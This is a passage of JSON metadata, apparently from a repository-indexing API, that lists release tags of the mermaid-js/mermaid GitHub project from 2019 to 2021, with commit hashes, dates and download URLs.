arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_